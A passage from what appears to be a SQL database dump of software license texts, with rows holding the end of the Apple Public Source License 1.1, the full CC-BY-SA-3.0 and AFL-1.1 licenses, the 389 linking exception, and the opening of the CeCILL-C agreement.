the\nOriginal Code and any Modifications made by or on behalf of Apple (\"Apple\nModifications\"), and such Apple Modifications will not be automatically subject\nto this License. Apple may, at its sole discretion, choose to license such\nApple Modifications under this License, or on different terms from those contained\nin this License or may choose not to license them at all. Apple\'s development,\nuse, reproduction, modification, sublicensing and distribution of Covered\nCode will not be subject to this License.\n\n 12. Termination.\n\n12.1 Termination. This License and the rights granted hereunder will terminate:\n\n(a) automatically without notice from Apple if You fail to comply with any\nterm(s) of this License and fail to cure such breach within 30 days of becoming\naware of such breach;\n\n(b) immediately in the event of the circumstances described in Section 13.5(b);\nor\n\n(c) automatically without notice from Apple if You, at any time during the\nterm of this License, commence an action for patent infringement against Apple.\n\n12.2 Effect of Termination. Upon termination, You agree to immediately stop\nany further use, reproduction, modification, sublicensing and distribution\nof the Covered Code and to destroy all copies of the Covered Code that are\nin your possession or control. All sublicenses to the Covered Code which have\nbeen properly granted prior to termination shall survive any termination of\nthis License. Provisions which, by their nature, should remain in effect beyond\nthe termination of this License shall survive, including but not limited to\nSections 3, 5, 8, 9, 10, 11, 12.2 and 13. Neither party will be liable to\nthe other for compensation, indemnity or damages of any sort solely as a result\nof terminating this License in accordance with its terms, and termination\nof this License will be without prejudice to any other right or remedy of\neither party.\n\n 13. Miscellaneous.\n\n13.1 Government End Users. The Covered Code is a \"commercial item\" as defined\nin FAR 2.101. Government software and technical data rights in the Covered\nCode include only those rights customarily provided to the public as defined\nin this License. This customary commercial license in technical data and software\nis provided in accordance with FAR 12.211 (Technical Data) and 12.212 (Computer\nSoftware) and, for Department of Defense purchases, DFAR 252.227-7015 (Technical\nData -- Commercial Items) and 227.7202-3 (Rights in Commercial Computer Software\nor Computer Software Documentation). Accordingly, all U.S. Government End\nUsers acquire Covered Code with only those rights set forth herein.\n\n13.2 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween You and Apple, and You will not represent to the contrary, whether\nexpressly, by implication, appearance or otherwise.\n\n13.3 Independent Development. Nothing in this License will impair Apple\'s\nright to acquire, license, develop, have others develop for it, market and/or\ndistribute technology or products that perform the same or similar functions\nas, or otherwise compete with, Modifications, Larger Works, technology or\nproducts that You may\n\n develop, produce, market or distribute.\n\n13.4 Waiver; Construction. Failure by Apple to enforce any provision of this\nLicense will not be deemed a waiver of future enforcement of that or any other\nprovision. Any law or regulation which provides that the language of a contract\nshall be construed against the drafter will not apply to this License.\n\n13.5 Severability. (a) If for any reason a court of competent jurisdiction\nfinds any provision of this License, or portion thereof, to be unenforceable,\nthat provision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and effect. (b) Notwithstanding\nthe foregoing, if applicable law prohibits or restricts You from fully and/or\nspecifically complying with Sections 2 and/or 3 or prevents the enforceability\nof either of those Sections, this License will immediately terminate and You\nmust immediately discontinue any use of the Covered Code and destroy all copies\nof it that are in your possession or control.\n\n13.6 Dispute Resolution. Any litigation or other dispute resolution between\nYou and Apple relating to this License shall take place in the Northern District\nof California, and You and Apple hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that District with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n13.7 Entire Agreement; Governing Law. This License constitutes the entire\nagreement between the parties with respect to the subject matter hereof. This\nLicense shall be governed by the laws of the United States and the State of\nCalifornia, except that body of California law concerning conflicts of law.\n\nWhere You are located in the province of Quebec, Canada, the following clause\napplies: The parties hereby confirm that they have requested that this License\nand all related documents be drafted in English. Les parties ont exige que\nle present contrat et tous les documents connexes soient rediges en anglais.\nEXHIBIT A.\n\n\"Portions Copyright (c) 1999-2000 Apple Computer, Inc. All Rights Reserved.\nThis file contains Original Code and/or Modifications of Original Code as\ndefined in and that are subject to the Apple Public Source License Version\n1.1 (the \"License\"). You may not use this file except in compliance with the\nLicense. Please obtain a copy of the License at http://www.apple.com/publicsource\nand read it before using this file.\n\nThe Original Code and all software distributed under the License are distributed\non an \"AS IS\" basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED,\nAND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, INCLUDING WITHOUT LIMITATION,\nANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-\nINFRINGEMENT. Please see the License for the specific language governing rights\nand limitations under the License.\"\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(63,'CC-BY-SA-3.0','Creative Commons Attribution-ShareAlike 3.0 Unported CREATIVE COMMONS CORPORATION\nIS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION OF THIS\nLICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS\nPROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES\nREGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR DAMAGES RESULTING\nFROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE OR COPYRIGHT LAW IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. TO THE EXTENT THIS LICENSE MAY BE CONSIDERED\nTO BE A CONTRACT, THE LICENSOR GRANTS YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION\nOF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Adaptation\" means a work based upon the Work, or upon the Work and other\npre-existing works, such as a translation, adaptation, derivative work, arrangement\nof music or other alterations of a literary or artistic work, or phonogram\nor performance and includes cinematographic adaptations or any other form\nin which the Work may be recast, transformed, or adapted including in any\nform recognizably derived from the original, except that a work that constitutes\na Collection will not be considered an Adaptation for the purpose of this\nLicense. For the avoidance of doubt, where the Work is a musical work, performance\nor phonogram, the synchronization of the Work in timed-relation with a moving\nimage (\"synching\") will be considered an Adaptation for the purpose of this\nLicense.\n\nb. \"Collection\" means a collection of literary or artistic works, such as\nencyclopedias and anthologies, or performances, phonograms or broadcasts,\nor other works or subject matter other than works listed in Section 1(f) below,\nwhich, by reason of the selection and arrangement of their contents, constitute\nintellectual creations, in which the Work is included in its entirety in unmodified\nform along with one or more other contributions, each constituting separate\nand independent works in themselves, which together are assembled into a collective\nwhole. A work that constitutes a Collection will not be considered an Adaptation\n(as defined below) for the purposes of this License.\n\nc. \"Creative Commons Compatible License\" means a license that is listed at\nhttp://creativecommons.org/compatiblelicenses that has been approved by Creative\nCommons as being essentially equivalent to this License, including, at a minimum,\nbecause that license: (i) contains terms that have the same purpose, meaning\nand effect as the License Elements of this License; and, (ii) explicitly permits\nthe relicensing of adaptations of works made available under that license\nunder this License or a Creative Commons jurisdiction license with the same\nLicense Elements as this License.\n\nd. \"Distribute\" means to make available to the public the original and copies\nof the Work or Adaptation, as appropriate, through sale or other transfer\nof ownership.\n\ne. \"License Elements\" means the following high-level license attributes as\nselected by Licensor and indicated in the title of this License: Attribution,\nShareAlike.\n\nf. \"Licensor\" means the individual, individuals, entity or entities that offer(s)\nthe Work under the terms of this License.\n\ng. \"Original Author\" means, in the case of a literary or artistic work, the\nindividual, individuals, entity or entities who created the Work or if no\nindividual or entity can be identified, the publisher; and in addition (i)\nin the case of a performance the actors, singers, musicians, dancers, and\nother persons who act, sing, deliver, declaim, play in, interpret or otherwise\nperform literary or artistic works or expressions of folklore; (ii) in the\ncase of a phonogram the producer being the person or legal entity who first\nfixes the sounds of a performance or other sounds; and, (iii) in the case\nof broadcasts, the organization that transmits the broadcast.\n\nh. \"Work\" means the literary and/or artistic work offered under the terms\nof this License including without limitation any production in the literary,\nscientific and artistic domain, whatever may be the mode or form of its expression\nincluding digital form, such as a book, pamphlet and other writing; a lecture,\naddress, sermon or other work of the same nature; a dramatic or dramatico-musical\nwork; a choreographic work or entertainment in dumb show; a musical composition\nwith or without words; a cinematographic work to which are assimilated works\nexpressed by a process analogous to cinematography; a work of drawing, painting,\narchitecture, sculpture, engraving or lithography; a photographic work to\nwhich are assimilated works expressed by a process analogous to photography;\na work of applied art; an illustration, map, plan, sketch or three-dimensional\nwork relative to geography, topography, architecture or science; a performance;\na broadcast; a phonogram; a compilation of data to the extent it is protected\nas a copyrightable work; or a work performed by a variety or circus performer\nto the extent it is not otherwise considered a literary or artistic work.\n\ni. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\nj. \"Publicly Perform\" means to perform public recitations of the Work and\nto communicate to the public those public recitations, by any means or process,\nincluding by wire or wireless means or public digital performances; to make\navailable to the public Works in such a way that members of the public may\naccess these Works from a place and at a place individually chosen by them;\nto perform the Work to the public by any means or process and the communication\nto the public of the performances of the Work, including by public digital\nperformance; to broadcast and rebroadcast the Work by any means including\nsigns, sounds or images.\n\nk. \"Reproduce\" means to make copies of the Work by any means including without\nlimitation by sound or visual recordings and the right of fixation and reproducing\nfixations of the Work, including storage of a protected performance or phonogram\nin digital form or other electronic medium.\n\n2. Fair Dealing Rights. Nothing in this License is intended to reduce, limit,\nor restrict any uses free from copyright or rights arising from limitations\nor exceptions that are provided for in connection with the copyright protection\nunder copyright law or other applicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to Reproduce the Work, to incorporate the Work into one or more Collections,\nand to Reproduce the Work as incorporated in the Collections;\n\nb. to create and Reproduce Adaptations provided that any such Adaptation,\nincluding any translation in any medium, takes reasonable steps to clearly\nlabel, demarcate or otherwise identify that changes were made to the original\nWork. For example, a translation could be marked \"The original work was translated\nfrom English to Spanish,\" or a modification could indicate \"The original work\nhas been modified.\";\n\nc. to Distribute and Publicly Perform the Work including as incorporated in\nCollections; and,\n\n d. to Distribute and Publicly Perform Adaptations.\n\n e. For the avoidance of doubt:\n\ni. Non-waivable Compulsory License Schemes. In those jurisdictions in which\nthe right to collect royalties through any statutory or compulsory licensing\nscheme cannot be waived, the Licensor reserves the exclusive right to collect\nsuch royalties for any exercise by You of the rights granted under this License;\n\nii. Waivable Compulsory License Schemes. In those jurisdictions in which the\nright to collect royalties through any statutory or compulsory licensing scheme\ncan be waived, the Licensor waives the exclusive right to collect such royalties\nfor any exercise by You of the rights granted under this License; and,\n\niii. Voluntary License Schemes. The Licensor waives the right to collect royalties,\nwhether individually or, in the event that the Licensor is a member of a collecting\nsociety that administers voluntary licensing schemes, via that society, from\nany exercise by You of the rights granted under this License.\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nSubject to Section 8(f), all rights not expressly granted by Licensor are\nhereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may Distribute or Publicly Perform the Work only under the terms of\nthis License. You must include a copy of, or the Uniform Resource Identifier\n(URI) for, this License with every copy of the Work You Distribute or Publicly\nPerform. You may not offer or impose any terms on the Work that restrict the\nterms of this License or the ability of the recipient of the Work to exercise\nthe rights granted to that recipient under the terms of the License. You may\nnot sublicense the Work. You must keep intact all notices that refer to this\nLicense and to the disclaimer of warranties with every copy of the Work You\nDistribute or Publicly Perform. When You Distribute or Publicly Perform the\nWork, You may not impose any effective technological measures on the Work\nthat restrict the ability of a recipient of the Work from You to exercise\nthe rights granted to that recipient under the terms of the License. This\nSection 4(a) applies to the Work as incorporated in a Collection, but this\ndoes not require the Collection apart from the Work itself to be made subject\nto the terms of this License. If You create a Collection, upon notice from\nany Licensor You must, to the extent practicable, remove from the Collection\nany credit as required by Section 4(c), as requested. If You create an Adaptation,\nupon notice from any Licensor You must, to the extent practicable, remove\nfrom the Adaptation any credit as required by Section 4(c), as requested.\n\nb. You may Distribute or Publicly Perform an Adaptation only under the terms\nof: (i) this License; (ii) a later version of this License with the same License\nElements as this License; (iii) a Creative Commons jurisdiction license (either\nthis or a later license version) that contains the same License Elements as\nthis License (e.g., Attribution-ShareAlike 3.0 US)); (iv) a Creative Commons\nCompatible License. If you license the Adaptation under one of the licenses\nmentioned in (iv), you must comply with the terms of that license. If you\nlicense the Adaptation under the terms of any of the licenses mentioned in\n(i), (ii) or (iii) (the \"Applicable License\"), you must comply with the terms\nof the Applicable License generally and the following provisions: (I) You\nmust include a copy of, or the URI for, the Applicable License with every\ncopy of each Adaptation You Distribute or Publicly Perform; (II) You may not\noffer or impose any terms on the Adaptation that restrict the terms of the\nApplicable License or the ability of the recipient of the Adaptation to exercise\nthe rights granted to that recipient under the terms of the Applicable License;\n(III) You must keep intact all notices that refer to the Applicable License\nand to the disclaimer of warranties with every copy of the Work as included\nin the Adaptation You Distribute or Publicly Perform; (IV) when You Distribute\nor Publicly Perform the Adaptation, You may not impose any effective technological\nmeasures on the Adaptation that restrict the ability of a recipient of the\nAdaptation from You to exercise the rights granted to that recipient under\nthe terms of the Applicable License. This Section 4(b) applies to the Adaptation\nas incorporated in a Collection, but this does not require the Collection\napart from the Adaptation itself to be made subject to the terms of the Applicable\nLicense.\n\nc. If You Distribute, or Publicly Perform the Work or any Adaptations or Collections,\nYou must, unless a request has been made pursuant to Section 4(a), keep intact\nall copyright notices for the Work and provide, reasonable to the medium or\nmeans You are utilizing: (i) the name of the Original Author (or pseudonym,\nif applicable) if supplied, and/or if the Original Author and/or Licensor\ndesignate another party or parties (e.g., a sponsor institute, publishing\nentity, journal) for attribution (\"Attribution Parties\") in Licensor\'s copyright\nnotice, terms of service or by other reasonable means, the name of such party\nor parties; (ii) the title of the Work if supplied; (iii) to the extent reasonably\npracticable, the URI, if any, that Licensor specifies to be associated with\nthe Work, unless such URI does not refer to the copyright notice or licensing\ninformation for the Work; and (iv), consistent with Section 3(b), in the case\nof an Adaptation, a credit identifying the use of the Work in the Adaptation\n(e.g., \"French translation of the Work by Original Author,\" or \"Screenplay\nbased on original Work by Original Author\"). The credit required by this Section\n4(c) may be implemented in any reasonable manner; provided, however, that\nin the case of a Adaptation or Collection, at a minimum such credit will appear,\nif a credit for all contributing authors of the Adaptation or Collection appears,\nthen as part of these credits and in a manner at least as prominent as the\ncredits for the other contributing authors. For the avoidance of doubt, You\nmay only use the credit required by this Section for the purpose of attribution\nin the manner set out above and, by exercising Your rights under this License,\nYou may not implicitly or explicitly assert or imply any connection with,\nsponsorship or endorsement by the Original Author, Licensor and/or Attribution\nParties, as appropriate, of You or Your use of the Work, without the separate,\nexpress prior written permission of the Original Author, Licensor and/or Attribution\nParties.\n\nd. Except as otherwise agreed in writing by the Licensor or as may be otherwise\npermitted by applicable law, if You Reproduce, Distribute or Publicly Perform\nthe Work either by itself or as part of any Adaptations or Collections, You\nmust not distort, mutilate, modify or take other derogatory action in relation\nto the Work which would be prejudicial to the Original Author\'s honor or reputation.\nLicensor agrees that in those jurisdictions (e.g. Japan), in which any exercise\nof the right granted in Section 3(b) of this License (the right to make Adaptations)\nwould be deemed to be a distortion, mutilation, modification or other derogatory\naction prejudicial to the Original Author\'s honor and reputation, the Licensor\nwill waive or not assert, as appropriate, this Section, to the fullest extent\npermitted by the applicable national law, to enable You to reasonably exercise\nYour right under Section 3(b) of this License (right to make Adaptations)\nbut not otherwise.\n\n 5. Representations, Warranties and Disclaimer\n\nUNLESS OTHERWISE MUTUALLY AGREED TO BY THE PARTIES IN WRITING, LICENSOR OFFERS\nTHE WORK AS-IS AND MAKES NO REPRESENTATIONS OR WARRANTIES OF ANY KIND CONCERNING\nTHE WORK, EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING, WITHOUT LIMITATION,\nWARRANTIES OF TITLE, MERCHANTIBILITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT,\nOR THE ABSENCE OF LATENT OR OTHER DEFECTS, ACCURACY, OR THE PRESENCE OF ABSENCE\nOF ERRORS, WHETHER OR NOT DISCOVERABLE. SOME JURISDICTIONS DO NOT ALLOW THE\nEXCLUSION OF IMPLIED WARRANTIES, SO SUCH EXCLUSION MAY NOT APPLY TO YOU.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nIN NO EVENT WILL LICENSOR BE LIABLE TO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL,\nINCIDENTAL, CONSEQUENTIAL, PUNITIVE OR EXEMPLARY DAMAGES ARISING OUT OF THIS\nLICENSE OR THE USE OF THE WORK, EVEN IF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Adaptations or Collections from You under this License,\nhowever, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You Distribute or Publicly Perform the Work or a Collection,\nthe Licensor offers to the recipient a license to the Work on the same terms\nand conditions as the license granted to You under this License.\n\nb. Each time You Distribute or Publicly Perform an Adaptation, Licensor offers\nto the recipient a license to the original Work on the same terms and conditions\nas the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nf. The rights granted under, and the subject matter referenced, in this License\nwere drafted utilizing the terminology of the Berne Convention for the Protection\nof Literary and Artistic Works (as amended on September 28, 1979), the Rome\nConvention of 1961, the WIPO Copyright Treaty of 1996, the WIPO Performances\nand Phonograms Treaty of 1996 and the Universal Copyright Convention (as revised\non July 24, 1971). These rights and subject matter take effect in the relevant\njurisdiction in which the License terms are sought to be enforced according\nto the corresponding provisions of the implementation of those treaty provisions\nin the applicable national law. If the standard suite of rights granted under\napplicable copyright law includes additional rights not granted under this\nLicense, such additional rights are deemed to be included in the License;\nthis License is not intended to restrict the license of any rights under applicable\nlaw.\n\nCreative Commons Notice\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, Creative Commons does not authorize the use by either\nparty of the trademark \"Creative Commons\" or any related trademark or logo\nof Creative Commons without the prior written consent of Creative Commons.\nAny permitted use will be in compliance with Creative Commons\' then-current\ntrademark usage guidelines, as may be published on its website or otherwise\nmade available upon request from time to time. For the avoidance of doubt,\nthis trademark restriction does not form part of the License.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(64,'389-exception','This Program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 of the License.\n\nThis Program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License along with this Program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.\n\nIn addition, as a special exception, Red Hat, Inc. gives You the additional right to link the code of this Program with code not covered under the GNU General Public License (\"Non-GPL Code\") and to distribute linked combinations including the two, subject to the limitations in this paragraph. Non-GPL Code permitted under this exception must only link to the code of this Program through those well defined interfaces identified in the file named EXCEPTION found in the source code files (the \"Approved Interfaces\"). The files of Non-GPL Code may instantiate templates or use macros or inline functions from the Approved Interfaces without causing the resulting work to be covered by the GNU General Public License. Only Red Hat, Inc. may make changes or additions to the list of Approved Interfaces. You must obey the GNU General Public License in all respects for all of the Program code and other code used in conjunction with the Program except the Non-GPL Code covered by this exception. If you modify this file, you may extend this exception to your version of the file, but you are not obligated to do so. If you do not wish to provide this exception without modification, you must delete this exception statement from your version and license this file solely under the GPL without exception.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(65,'AFL-1.1','Academic Free License\n\nVersion 1.1 The Academic Free License applies to any original work of authorship\n(the \"Original Work\") whose owner (the \"Licensor\") has placed the following\nnotice immediately following the copyright notice for the Original Work:\n\n\" Licensed under the Academic Free License version 1.1. \"\n\nGrant of License. Licensor hereby grants to any person obtaining a copy of\nthe Original Work (\"You\") a world-wide, royalty-free, non-exclusive, perpetual,\nnon-sublicenseable license\n\n(1) to use, copy, modify, merge, publish, perform, distribute and/or sell\ncopies of the Original Work and derivative works thereof, and\n\n(2) under patent claims owned or controlled by the Licensor that are embodied\nin the Original Work as furnished by the Licensor, to make, use, sell and\noffer for sale the Original Work and derivative works thereof, subject to\nthe following conditions.\n\nRight of Attribution. Redistributions of the Original Work must reproduce\nall copyright notices in the Original Work as furnished by the Licensor, both\nin the Original Work itself and in any documentation and/or other materials\nprovided with the distribution of the Original Work in executable form.\n\nExclusions from License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior written permission of the Licensor.\n\nWARRANTY AND DISCLAIMERS. LICENSOR WARRANTS THAT THE COPYRIGHT IN AND TO THE\nORIGINAL WORK IS OWNED BY THE LICENSOR OR THAT THE ORIGINAL WORK IS DISTRIBUTED\nBY LICENSOR UNDER A VALID CURRENT LICENSE FROM THE COPYRIGHT OWNER. EXCEPT\nAS EXPRESSLY STATED IN THE IMMEDIATELY PRECEEDING SENTENCE, THE ORIGINAL WORK\nIS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY, EITHER\nEXPRESS OR IMPLIED, INCLUDING, WITHOUT LIMITATION, THE WARRANTY OF NON-INFRINGEMENT\nAND WARRANTIES THAT THE ORIGINAL WORK IS MERCHANTABLE OR FIT FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nTHIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE.\nNO LICENSE TO ORIGINAL WORK IS GRANTED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\nLIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY,\nWHETHER TORT (INCLUDING NEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL THE LICENSOR\nBE LIABLE TO ANY PERSON FOR ANY DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR\nCONSEQUENTIAL DAMAGES OF ANY CHARACTER ARISING AS A RESULT OF THIS LICENSE\nOR THE USE OF THE ORIGINAL WORK INCLUDING, WITHOUT LIMITATION, DAMAGES FOR\nLOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND\nALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PERSON SHALL HAVE BEEN\nINFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\nLicense to Source Code. The term \"Source Code\" means the preferred form of\nthe Original Work for making modifications to it and all available documentation\ndescribing how to access and modify the Original Work. Licensor hereby agrees\nto provide a machine-readable copy of the Source Code of the Original Work\nalong with each copy of the Original Work that Licensor distributes. Licensor\nreserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\nMutual Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nif You file a lawsuit in any court alleging that any OSI Certified open source\nsoftware that is licensed under any license containing this \"Mutual Termination\nfor Patent Action\" clause infringes any patent claims that are essential to\nuse that software.\n\nThis license is Copyright (C) 2002 Lawrence E. Rosen. All rights reserved.\n\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(66,'CECILL-C','CeCILL-C FREE SOFTWARE LICENSE AGREEMENT Notice\n\nThis Agreement is a Free Software license agreement that is the result of\ndiscussions between its authors in order to ensure compliance with the two\nmain principles guiding its drafting:\n\n* firstly, compliance with the principles governing the distribution of Free\nSoftware: access to source code, broad rights granted to users,\n\n* secondly, the election of a governing law, French law, with which it is\nconformant, both as regards the law of torts and intellectual property law,\nand the protection that it offers to both authors and holders of the economic\nrights over software.\n\nThe authors of the CeCILL¹ license are:\n\n \n\nCommissariat à l\'Energie Atomique - CEA, a public scientific, technical and\nindustrial research establishment, having its principal place of business\nat 25 rue Leblanc, immeuble Le Ponant D, 75015 Paris, France.\n\n \n\nCentre National de la Recherche Scientifique - CNRS, a public scientific and\ntechnological establishment, having its principal place of business at 3 rue\nMichel-Ange, 75794 Paris cedex 16, France.\n\n \n\nInstitut National de Recherche en Informatique et en Automatique - INRIA,\na public scientific and technological establishment, having its principal\nplace of business at Domaine de Voluceau, Rocquencourt, BP 105, 78153 Le Chesnay\ncedex, France.\n\nPreamble The purpose of this Free Software license agreement is to grant users\nthe right to modify and re-use the software governed by this license.\n\nThe exercising of this right is conditional upon the obligation to make available\nto the community the modifications made to the source code of the software\nso as to contribute to its evolution.\n\nIn consideration of access to the source code and the rights to copy, modify\nand redistribute granted by the license, users are provided only with a limited\nwarranty and the software\'s author, the holder of the economic rights, and\nthe successive licensors only have limited liability.\n\nIn this respect, the risks associated with loading, using, modifying and/or\ndeveloping or reproducing the software by the user are brought to the user\'s\nattention, given its Free Software status, which may make it complicated to\nuse, with the result that its use is reserved for developers and experienced\nprofessionals having in-depth computer knowledge. Users are therefore encouraged\nto load and test the suitability of the software as regards their requirements\nin conditions enabling the security of their systems and/or data to be ensured\nand, more generally, to use and operate it in the same conditions of security.\nThis Agreement may be freely reproduced and published, provided it is not\naltered, and that no provisions are either added or removed herefrom.\n\nThis Agreement may apply to any or all software for which the holder of the\neconomic rights decides to submit the use thereof to its provisions.\n\n Article 1 - DEFINITIONS\n\nFor the purpose of this Agreement, when the following expressions commence\nwith a capital letter, they shall have the following meaning:\n\n \n\nAgreement: means this license agreement, and its possible subsequent versions\nand annexes.\n\n \n\nSoftware: means the software in its Object Code and/or Source Code form and,\nwhere applicable, its documentation, \"as is\" when the Licensee accepts the\nAgreement.\n\n \n\nInitial Software: means the Software in its Source Code and possibly its Object\nCode form and, where applicable, its documentation, \"as is\" when it is first\ndistributed under the terms and conditions of the Agreement.\n\n \n\nModified Software: means the Software modified by at least one Integrated\nContribution.\n\n \n\nSource Code: means all the Software\'s instructions and program lines to which\naccess is required so as to modify the Software.\n\n \n\nObject Code: means the binary files originating from the compilation of the\nSource Code.\n\n \n\nHolder: means the holder(s) of the economic rights over the Initial Software.\n\n \n\n Licensee: means the Software user(s) having accepted the Agreement.\n\n \n\nContributor: means a Licensee having made at least one Integrated Contribution.\n\n \n\nLicensor: means the Holder, or any other individual or legal entity, who distributes\nthe Software under the Agreement.\n\n \n\nIntegrated Contribution: means any or all modifications, corrections, translations,\nadaptations and/or new functions integrated into the Source Code by any or\nall Contributors.\n\n \n\nRelated Module: means a set of sources files including their documentation\nthat, without modification to the Source Code, enables supplementary functions\nor services in addition to those offered by the Software.\n\n \n\nDerivative Software: means any combination of the Software, modified or not,\nand of a Related Module.\n\n \n\n Parties: mean both the Licensee and the Licensor.\n\n These expressions may be used both in singular and plural form.\n\n Article 2 - PURPOSE\n\nThe purpose of the Agreement is the grant by the Licensor to the Licensee\nof a non-exclusive, transferable and worldwide license for the Software as\nset forth in Article 5 hereinafter for the whole term of the protection granted\nby the rights over said Software.\n\n Article 3 - ACCEPTANCE\n\n3.1 The Licensee shall be deemed as having accepted the terms and conditions\nof this Agreement upon the occurrence of the first of the following events:\n\n(i) loading the Software by any or all means, notably, by downloading from\na remote server, or by loading from a 